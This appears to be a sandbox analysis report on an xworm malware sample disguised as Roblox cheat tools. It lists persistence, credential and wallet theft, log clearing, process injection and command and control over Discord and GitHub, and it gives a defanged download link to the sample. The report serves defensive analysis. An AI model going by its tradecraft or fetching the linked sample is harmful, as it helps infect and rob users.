xworm | hxxps://gofile[.]io/d/MqvFWU

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	setup7.0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveWindows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveWindows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Bloxstrap.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveWindows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	FluxusInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WaveBootstrapper.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 10 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fluxus.exe	fluxus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fluxus.exe	fluxus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveUpdater.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveBootstrapper.exe	update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troubleshoot.exe	troubleshoot.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\fluxus.exe	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fluxus.exe	fluxus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fluxus.exe	fluxus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WaveUpdater.lnk	XClient.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\wavebootstrapper.exe	taskmgr.exe

Executes dropped EXE 64 IoCs

pid	Process
3112	Kiwi X External.exe
5920	Kiwi X External.exe
6056	Kiwi X External.exe
3320	Kiwi X External.exe
5972	FluxusInstaller.exe
5772	terms.exe
5160	fluxus.exe
5632	fluxus.exe
4760	fluxus.exe
1128	fluxus.exe
5344	terms.exe
5060	FluxusLoader.exe
5512	FluxusLoader.exe
2176	FluxusLoader.exe
4272	FluxusLoader.exe
816	lua.exe
6100	lua.exe
1708	lua.exe
5100	WaveInstaller.exe
5492	WaveInstaller.exe
5864	WaveCrack.exe
768	WavePatcher.exe
2220	XClient.exe
556	WavePatcher.exe
3452	gptwlkqtlame.exe
4408	WaveUpdater.exe
3624	WaveBootstrapper.exe
6028	WaveWindows.exe
2636	node.exe
4484	WavePatcher.exe
5412	WavePatcher.exe
2924	XClient.exe
408	WaveCrack.exe
2172	WaveUpdater.exe
5040	gptwlkqtlame.exe
4820	WaveUpdater.exe
4444	WaveUpdater.exe
1076	WaveUpdater.exe
4276	setup7.0.exe
5324	setup7.0.exe
4904	WaveUpdater.exe
1408	WaveUpdater.exe
5112	WaveInstaller.exe
4408	WaveInstaller.exe
3128	WaveUpdater.exe
3724	WaveUpdater.exe
3628	troubleshoot.exe
5972	update.exe
3692	WaveBootstrapper.exe
4840	troubleshoot.exe
6072	WaveWindows.exe
4176	node.exe
116	WaveBootstrapper.exe
3564	WaveBootstrapper.exe
1332	WaveUpdater.exe
6020	WaveWindows.exe
5448	node.exe
1580	Bloxstrap.exe
5432	WaveUpdater.exe
5656	WaveUpdater.exe
3516	WaveUpdater.exe
5484	WaveUpdater.exe
3400	WaveUpdater.exe
1628	WaveUpdater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 4 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx	svchost.exe

Loads dropped DLL 64 IoCs

pid	Process
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
5632	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe
1128	fluxus.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaveUpdater = "C:\\ProgramData\\WaveUpdater.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\KasperskyLab\Session	WaveWindows.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\KasperskyLab	WaveWindows.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\KasperskyLab\LastUsername = "necro"	WaveWindows.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\KasperskyLab	WaveWindows.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\KasperskyLab	WaveWindows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\KasperskyLab\LastUsername	WaveWindows.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 49 IoCs

Web Service

T1102

flow	ioc
135	discord.com
643	discord.com
634	raw.githubusercontent.com
642	discord.com
378	raw.githubusercontent.com
454	camo.githubusercontent.com
616	discord.com
633	discord.com
641	discord.com
650	discord.com
607	discord.com
614	pastebin.com
615	pastebin.com
340	raw.githubusercontent.com
580	raw.githubusercontent.com
606	discord.com
626	discord.com
654	discord.com
136	discord.com
193	camo.githubusercontent.com
337	raw.githubusercontent.com
658	discord.com
628	raw.githubusercontent.com
631	discord.com
638	discord.com
651	discord.com
652	discord.com
338	discord.com
610	discord.com
627	raw.githubusercontent.com
653	discord.com
339	discord.com
341	raw.githubusercontent.com
377	discord.com
612	discord.com
630	raw.githubusercontent.com
138	discord.com
192	camo.githubusercontent.com
336	raw.githubusercontent.com
656	discord.com
657	discord.com
629	discord.com
655	discord.com
191	camo.githubusercontent.com
194	camo.githubusercontent.com
366	raw.githubusercontent.com
637	discord.com
639	discord.com
640	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
468	api.ipify.org
593	api.ipify.org
259	ip-api.com
352	ipapi.co
353	ipapi.co
381	ipapi.co
467	api.ipify.org

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2212	powercfg.exe
5336	powercfg.exe
440	powercfg.exe
2124	powercfg.exe
5860	powercfg.exe
1616	powercfg.exe
5740	powercfg.exe
4696	powercfg.exe
5284	powercfg.exe
4188	powercfg.exe
5376	powercfg.exe
3480	powercfg.exe
5884	powercfg.exe
5308	powercfg.exe
1172	powercfg.exe
2288	powercfg.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
6076	cmd.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\WaveBootstrapper	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 5864 set thread context of 4696	5864	WaveCrack.exe	310
PID 408 set thread context of 1884	408	WaveCrack.exe	378
PID 5040 set thread context of 2884	5040	gptwlkqtlame.exe	392
PID 4276 set thread context of 5324	4276	setup7.0.exe	421

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023db1-711.dat	upx
behavioral1/memory/5632-715-0x00007FFD2FAD0000-0x00007FFD300C2000-memory.dmp	upx
behavioral1/files/0x0007000000023dab-723.dat	upx
behavioral1/memory/5632-726-0x00007FFD4D110000-0x00007FFD4D11F000-memory.dmp	upx
behavioral1/memory/5632-732-0x00007FFD4D0C0000-0x00007FFD4D0ED000-memory.dmp	upx
behavioral1/memory/5632-731-0x00007FFD4D0F0000-0x00007FFD4D109000-memory.dmp	upx
behavioral1/files/0x0007000000023d86-730.dat	upx
behavioral1/files/0x0007000000023d80-728.dat	upx
behavioral1/memory/5632-725-0x00007FFD4D120000-0x00007FFD4D144000-memory.dmp	upx
behavioral1/files/0x0007000000023d82-722.dat	upx
behavioral1/memory/5632-733-0x00007FFD4D0B0000-0x00007FFD4D0BD000-memory.dmp	upx
behavioral1/memory/5632-734-0x00007FFD4D090000-0x00007FFD4D0A4000-memory.dmp	upx
behavioral1/memory/5632-735-0x00007FFD33A60000-0x00007FFD33F89000-memory.dmp	upx
behavioral1/memory/5632-737-0x00007FFD4D060000-0x00007FFD4D06D000-memory.dmp	upx
behavioral1/memory/5632-736-0x00007FFD4D070000-0x00007FFD4D089000-memory.dmp	upx
behavioral1/memory/5632-741-0x00007FFD4D120000-0x00007FFD4D144000-memory.dmp	upx
behavioral1/memory/5632-740-0x00007FFD363D0000-0x00007FFD3649D000-memory.dmp	upx
behavioral1/memory/5632-739-0x00007FFD4D020000-0x00007FFD4D053000-memory.dmp	upx
behavioral1/memory/5632-738-0x00007FFD2FAD0000-0x00007FFD300C2000-memory.dmp	upx
behavioral1/memory/5632-742-0x00007FFD45D30000-0x00007FFD45D66000-memory.dmp	upx
behavioral1/memory/5632-744-0x00007FFD4C2E0000-0x00007FFD4C303000-memory.dmp	upx
behavioral1/memory/5632-743-0x00007FFD4D0C0000-0x00007FFD4D0ED000-memory.dmp	upx
behavioral1/memory/5632-745-0x00007FFD33150000-0x00007FFD332CE000-memory.dmp	upx
behavioral1/memory/5632-746-0x00007FFD4C160000-0x00007FFD4C178000-memory.dmp	upx
behavioral1/memory/5632-747-0x00007FFD4D090000-0x00007FFD4D0A4000-memory.dmp	upx
behavioral1/memory/5632-751-0x00007FFD362B0000-0x00007FFD363CC000-memory.dmp	upx
behavioral1/memory/5632-750-0x00007FFD45D00000-0x00007FFD45D26000-memory.dmp	upx
behavioral1/memory/5632-749-0x00007FFD4C150000-0x00007FFD4C15B000-memory.dmp	upx
behavioral1/memory/5632-748-0x00007FFD33A60000-0x00007FFD33F89000-memory.dmp	upx
behavioral1/memory/5632-752-0x00007FFD4D070000-0x00007FFD4D089000-memory.dmp	upx
behavioral1/memory/5632-753-0x00007FFD45BA0000-0x00007FFD45BD7000-memory.dmp	upx
behavioral1/memory/5632-754-0x00007FFD4A690000-0x00007FFD4A69B000-memory.dmp	upx
behavioral1/memory/5632-755-0x00007FFD4A230000-0x00007FFD4A23B000-memory.dmp	upx
behavioral1/memory/5632-758-0x00007FFD4A1A0000-0x00007FFD4A1AB000-memory.dmp	upx
behavioral1/memory/5632-757-0x00007FFD4A220000-0x00007FFD4A22C000-memory.dmp	upx
behavioral1/memory/5632-756-0x00007FFD363D0000-0x00007FFD3649D000-memory.dmp	upx
behavioral1/memory/5632-769-0x00007FFD45CA0000-0x00007FFD45CAC000-memory.dmp	upx
behavioral1/memory/5632-768-0x00007FFD45C70000-0x00007FFD45C7B000-memory.dmp	upx
behavioral1/memory/5632-767-0x00007FFD362B0000-0x00007FFD363CC000-memory.dmp	upx
behavioral1/memory/5632-777-0x00007FFD45B30000-0x00007FFD45B3C000-memory.dmp	upx
behavioral1/memory/5632-776-0x00007FFD45B40000-0x00007FFD45B52000-memory.dmp	upx
behavioral1/memory/5632-775-0x00007FFD45B60000-0x00007FFD45B6D000-memory.dmp	upx
behavioral1/memory/5632-774-0x00007FFD45BA0000-0x00007FFD45BD7000-memory.dmp	upx
behavioral1/memory/5632-778-0x00007FFD32F00000-0x00007FFD33149000-memory.dmp	upx
behavioral1/memory/5632-773-0x00007FFD45B70000-0x00007FFD45B7B000-memory.dmp	upx
behavioral1/memory/5632-772-0x00007FFD45B80000-0x00007FFD45B8C000-memory.dmp	upx
behavioral1/memory/5632-771-0x00007FFD45B90000-0x00007FFD45B9B000-memory.dmp	upx
behavioral1/memory/5632-770-0x00007FFD45D00000-0x00007FFD45D26000-memory.dmp	upx
behavioral1/memory/5632-766-0x00007FFD45CB0000-0x00007FFD45CBE000-memory.dmp	upx
behavioral1/memory/5632-765-0x00007FFD4C160000-0x00007FFD4C178000-memory.dmp	upx
behavioral1/memory/5632-764-0x00007FFD45CC0000-0x00007FFD45CCD000-memory.dmp	upx
behavioral1/memory/5632-763-0x00007FFD45DE0000-0x00007FFD45DEC000-memory.dmp	upx
behavioral1/memory/5632-762-0x00007FFD33150000-0x00007FFD332CE000-memory.dmp	upx
behavioral1/memory/5632-761-0x00007FFD465D0000-0x00007FFD465DB000-memory.dmp	upx
behavioral1/memory/5632-760-0x00007FFD4A190000-0x00007FFD4A19C000-memory.dmp	upx
behavioral1/memory/5632-759-0x00007FFD4C2E0000-0x00007FFD4C303000-memory.dmp	upx
behavioral1/memory/5632-790-0x00007FFD45050000-0x00007FFD4507E000-memory.dmp	upx
behavioral1/memory/5632-789-0x00007FFD4A1A0000-0x00007FFD4A1AB000-memory.dmp	upx
behavioral1/memory/5632-788-0x00007FFD45080000-0x00007FFD450A9000-memory.dmp	upx
behavioral1/memory/5632-826-0x00007FFD33A60000-0x00007FFD33F89000-memory.dmp	upx
behavioral1/memory/5632-848-0x00007FFD4D020000-0x00007FFD4D053000-memory.dmp	upx
behavioral1/memory/5632-847-0x00007FFD4D070000-0x00007FFD4D089000-memory.dmp	upx
behavioral1/memory/5632-846-0x00007FFD4D060000-0x00007FFD4D06D000-memory.dmp	upx
behavioral1/memory/5632-845-0x00007FFD45D00000-0x00007FFD45D26000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Setup\Scripts\ErrorHandler.cmd	lua.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\INF\netsstpa.PNF	Explorer.EXE
File created	C:\Windows\INF\netrasa.PNF	Explorer.EXE

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
900	sc.exe
1612	sc.exe
5756	sc.exe
2000	sc.exe
5384	sc.exe
5824	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000300000000071b-576.dat	pyinstaller
behavioral1/files/0x0007000000023e32-2827.dat	pyinstaller
behavioral1/files/0x0008000000023f48-6936.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4904	6028	WerFault.exe	340
1676	6072	WerFault.exe	489

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveBootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	terms.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveWindows.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveWindows.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	terms.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveWindows.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveBootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveBootstrapper.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3060	cmd.exe
5332	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1928	cmd.exe
1644	netsh.exe
4720	cmd.exe
2924	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
